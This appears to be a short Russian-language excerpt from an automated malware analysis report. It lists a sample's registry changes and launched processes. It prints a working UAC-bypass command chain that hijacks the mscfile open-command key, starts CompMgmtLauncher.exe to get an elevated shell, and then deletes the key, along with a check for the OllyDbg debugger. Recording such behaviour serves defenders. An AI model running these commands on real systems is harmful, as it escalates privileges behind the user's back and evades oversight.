Техническая информация
- [<HKCU>\Software\Classes\mscfile\shell\open\command] '' = 'cmd.exe'
- ClassName: 'OLLYDBG', WindowName: ''
- '<SYSTEM32>\cmd.exe' /kreg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W <SYSTEM32>\CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /kreg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W <SYSTEM32>\CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f
- '<SYSTEM32>\reg.exe' add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f
- '<SYSTEM32>\compmgmtlauncher.exe'
- '<SYSTEM32>\cmd.exe'
- '<SYSTEM32>\reg.exe' delete HKEY_CURRENT_USER\Software\Classes\mscfile /f